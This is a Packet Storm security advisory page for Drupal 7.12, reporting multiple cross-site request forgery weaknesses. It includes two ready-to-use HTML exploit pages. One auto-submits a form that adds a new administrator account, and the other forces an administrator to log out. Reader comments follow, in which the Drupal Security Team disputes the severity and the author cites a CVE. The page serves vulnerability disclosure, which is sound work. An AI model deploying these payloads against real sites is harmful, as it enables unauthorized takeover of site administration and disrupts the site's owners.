Twenty Year Anniversary

Drupal CMS 7.12 Cross Site Request Forgery

Drupal CMS 7.12 Cross Site Request Forgery
Posted Mar 2, 2012
Authored by Ivano Binetti

Drupal CMS version 7.12 suffers from multiple cross site request forgery vulnerabilities.

tags | exploit, vulnerability, csrf
MD5 | 624cc16af3f882c63334256d25a4f257

Drupal CMS 7.12 Cross Site Request Forgery

Change Mirror Download
+---------------------------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities
# Date : 02-03-2012
# Author : Ivano Binetti (http://ivanobinetti.com)
# Software link : http://ftp.drupal.org/files/projects/drupal-7.12.zip
# Vendor site : http://drupal.org
# Version : 7.12 (and lower)
# Tested on : Debian Squeeze (6.0)
# Original Advisory: http://ivanobinetti.blogspot.com/2012/03/drupal-cms-712-latest-stable-release.html
# EDB-ID : 18564 (http://www.exploit-db.com/exploits/18564/)
# Other Advisory : http://packetstormsecurity.org/files/110404/Drupal-CMS-7.12-Cross-Site-Request-Forgery.html
# Other Advisory : http://www.1337day.com/exploits/17611
+---------------------------------------------------------------------------------------------------------------------------------------------------+
+-------------------------[Multiple Vulnerabilities by Ivano Binetti]-------------------------------------------------------------------------------+
Summary

1)Introduction
2)Vulnerabilities Description
2.1 Poor Session Checking (CSRF to change any Drupal settings)
2.2 Poor Session Checking (CSRF to Force administrator logout)
2.3 Poor Session Checking (POST and GET method)
2.4 Poor Session Checking (Http Referer)
3)Exploit
3.1 Exploit (Add Administrator)
3.2 Exploit (Force logout)

+---------------------------------------------------------------------------------------------------------------------------------------------------+

1)Introduction
Drupal "is an open source content management platform powering millions of websites and applications. It’s built, used, and supported by an active
and diverse community of people around the world".

2)Vulnerability Description
Drupal 7.12 -latest stable release - suffers from multiple vulnerabilities which could allow an attacker to gain access to the management interface.

2.1 Poor Session Checking (CSRF to change any Drupal settings)
Drupal, to secure changes made by administrators or users through web management interface, uses "form_token" parameter which is sent inside
any http POST request.
There is a security flaw inside the logic with which this parameter is generated, as is used the same parameter for for similar operations
(the same "form_id") in the same session (for example for article's creation Drupal assigns the same "form_token", for admin/user
creation Drupal assigns the same "form_token" and so on).
Another flaw is inside "form_buid_id" parameter, which is used “to fetch state from a database table during certain operations”. This parameter
is generated different for any operation an admin/user performs, but Drupal allows to use any other Drupal generated "form_buid_id" parameter
(like this: "form-0iFqLlofT1uuJ_uwXPNdVlc_J9KL20oZE15dK9hxuQ8") to make changes to Drupal settings through web management interface.
So, even if Drupal creates a different "form_buid_id" for any operation you can use another "form_buid_id"compatible with Drupal instead of that
generated by Drupa for that specific operation.
These flaws can be used by an attacker who knows the values of "form_buid_id" and "form_token" parameters (for example an internal attacker
performing a "Man in The Middle Attack" or an external attacker that controls an internal client by an client-side exploit, an external attacker
that controls directly a Drupal admin by a client-side exploit and son on. There are many possibilities) to create an "ad-hoc" crafted web page
in order to makes any Drupal changes (add administrator, delete administrator, add web pages, delete web pages, ....) when a Drupal administrator
or User browses that crafted web page.


2.2 Poor Session Checking (CSRF to Force administrator logout)
There is another vulnerability - always related to poor session checking / improper input validation - in "<drupal_ip>/user/logout" which allows
an attacker to create a crafted web page an force logout of Drupal administrator/users at web management interface. This vulnerability - forcing
administrator logout - will aid an attacker to sniff authentication credentials when a "Man in The Middle Attack" is performed.

2.3 Poor Session Checking (POST and GET method)
Drupal does not check "GET" or "POST" http method allowing, even though normal logout is made via http GET request, to exploit the above vulnerability
using http POST method.

2.4 Poor Session Checking (Http Referer)
Drupal, furthermore, does not perform "http referer" checking, allowing to exploit all above described vulnerabilities.

3)Exploit

3.1 Exploit (Add Administrator)
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit change user to admin</H2>
<form method="POST" name="form0" action="http://<drupal_ip>:80/drupal/admin/people/create?render=overlay&render=overlay">
<input type="hidden" name="name" value="new_admin"/>
<input type="hidden" name="mail" value="new_admin@new_admin.com"/>
<input type="hidden" name="pass[pass1]" value="new_password"/>
<input type="hidden" name="pass[pass2]" value="new_password"/>
<input type="hidden" name="status" value="1"/>
<input type="hidden" name="roles[3]" value="3"/>
<input type="hidden" name="timezone" value="Europe/Prague"/>
<input type="hidden" name="form_build_id" value="form-oUkbOYDjyZag-LhYFHvlPXM1rJzOHCjlHojoh_hS3pY"/>
<input type="hidden" name="form_token" value="cU7nmlpWu-a4UKGFDBcVjEutgvoEidfK1Zgw0HFAtXc"/>
<input type="hidden" name="form_id" value="user_register_form"/>
<input type="hidden" name="op" value="Create new account"/>
</form>
</body>
</html>


3.2 Exploit (Force logout)
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to logout Admin</H2>
<form method="POST" name="form0" action="http://<drupal_ip>:80/drupal/user/logout">
</form>
</body>
</html>


+--------------------------------------------------------------------------------------------------------------------------------------------------+

Comments (3)

RSS Feed Subscribe to this comment feed
davidrothstein

Please note that the Drupal Security Team does not consider this to be a valid security vulnerability.

A detailed response is posted at drupal.org/node/1475530 and groups.drupal.org/node/216314

Comment by davidrothstein
2012-03-10 22:49:30 UTC | Permalink | Reply
ibinetti

Hi David,
if you read comment inserted in detailed response (groups.drupal.org/node/216314), Greg Knaddison (greggles) - Head of Drupal Security Team - writes: "I think there are some legitimate bugs here, but I don't see how the bugs can be exploited for security reasons. The fact that we have multiple forms with the same form_id should be fixed since form_id determines the form_token".

The security scenario is a network sniffing activity (or worse a MITM attack) as Heine Deelstra (Heine) - ex head of Drupal Security Team and actual member team - says in the same post.

In my opinion this is a "Mediom Risk" vulnerability as IBM X-Force has correctly classified it (xforce.iss.net/xforce/xfdb/73674)

Best Regards,
Ivano Binetti

Comment by ibinetti
2012-03-19 16:23:12 UTC | Permalink | Reply
ibinetti

MITRE CVE Numbering Authority assigned CVE-2007-6752 (cve.mitre.org/cgi-bin/cvename.cgi…) for "force user/logout" vulnerability, sections 2.2, 3.2 of my Drupal 7.12 CSRF Advisory (www.webapp-security.com/2012/03/drupal-cms-…).

Furthermore MITRE CVE Numbering Authority, considers that:

. Sections 2.1 and 3.1 – Poor Session Checking (CSRF to change any Drupal settings) – would be a Drupal’s “Security Improvement”.
. Section 2.3 – Poor Session Checking (POST and GET method) – and section 2.4 - Poor Session Checking (Http Referer) - would be Drupal’s “Potential Security Improvements”.

Comment by ibinetti
2012-03-29 15:45:47 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    1 Files
  • 10
    Dec 10th
    15 Files
  • 11
    Dec 11th
    30 Files
  • 12
    Dec 12th
    25 Files
  • 13
    Dec 13th
    15 Files
  • 14
    Dec 14th
    14 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close